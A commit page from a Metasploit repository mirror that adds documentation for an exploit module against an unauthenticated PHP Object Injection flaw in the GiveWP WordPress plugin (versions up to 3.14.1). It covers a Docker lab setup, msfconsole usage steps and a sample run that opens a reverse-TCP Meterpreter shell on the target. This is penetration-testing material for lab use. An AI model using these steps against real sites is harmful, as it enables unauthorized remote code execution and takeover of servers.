adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Land #19424, WordPress GiveWP Plugin RCE

Browse Source
This commit is contained in:
adfoster-r7
2024-08-28 21:09:42 +01:00
committed by GitHub
parent 3bab5277bc 71ee987079
commit 84ffa524e5
3 changed files with 266 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/multi/http/wp_givewp_rce.md
+94
View File
@@ -0,0 +1,94 @@
## Vulnerable Application
This Metasploit module exploits an unauthenticated PHP Object Injection vulnerability in the
GiveWP plugin for WordPress (versions <= 3.14.1).
The vulnerability is present in the 'give_title' parameter, allowing attackers to inject a crafted
PHP object leading to remote code execution (RCE) when combined with a suitable POP chain.
## Setup
1. **Docker Compose Setup**: Create the following `docker-compose.yml` file to set up a vulnerable WordPress environment:
```yaml
services:
db:
image: mysql:8.0.27
command: '--default-authentication-plugin=mysql_native_password'
restart: always
environment:
- MYSQL_ROOT_PASSWORD=somewordpress
- MYSQL_DATABASE=wordpress
- MYSQL_USER=wordpress
- MYSQL_PASSWORD=wordpress
expose:
- 3306
- 33060
wordpress:
image: wordpress:6.3.2
ports:
- "80:80"
restart: always
environment:
- WORDPRESS_DB_HOST=db
- WORDPRESS_DB_USER=wordpress
- WORDPRESS_DB_PASSWORD=wordpress
- WORDPRESS_DB_NAME=wordpress
volumes:
db_data:
```
1. Run Docker: `docker compose up`
1. Access the WordPress instance at `http://127.0.0.1` and complete the installation process
1. **Download and Install Vulnerable GiveWP Plugin**:
- Download the plugin: [GiveWP 3.14.1](https://downloads.wordpress.org/plugin/give.3.14.1.zip)
- Unzip the plugin and copy it to the Docker container:
```bash
docker compose cp give wordpress:/var/www/html/wp-content/plugins
```
- Access the WordPress instance at `http://localhost` and activate the GiveWP plugin via the admin dashboard.
1. **Create a Donation Form**:
- Navigate to the "Forms" section within the GiveWP plugin and click on "Add Form."
- Select any form.
- Configure the form as needed, publish it.
## Options
No specific options need to be configured.
## Verification Steps
1. Start `msfconsole`.
2. Use the module with `use exploit/multi/http/wp_givewp_rce`.
3. Set `RHOSTS`, `RPORT`, and the necessary WordPress-specific options.
4. Run the exploit.
5. Gain a Meterpreter session.
## Scenarios
### GiveWP Plugin version: 3.14.1 (Dockerized WordPress Version 6.3.2)
Using `cmd/linux/http/x64/meterpreter/reverse_tcp`:
```bash
msf6 > use exploit/multi/http/wp_givewp_rce
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:8888
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.3.2
[+] Detected GiveWP Plugin version: 3.14.1
[+] The target appears to be vulnerable.
[+] Successfully retrieved form list. Available Form IDs: 8, 10, 13
[*] Using Form ID: 13 for exploitation.
[*] Sending stage (3045380 bytes) to 172.24.0.3
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.24.0.3:51272) at 2024-08-27 22:11:22 +0200
meterpreter > sysinfo
Computer : 172.24.0.3
OS : Debian 11.8 (Linux 5.15.0-119-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```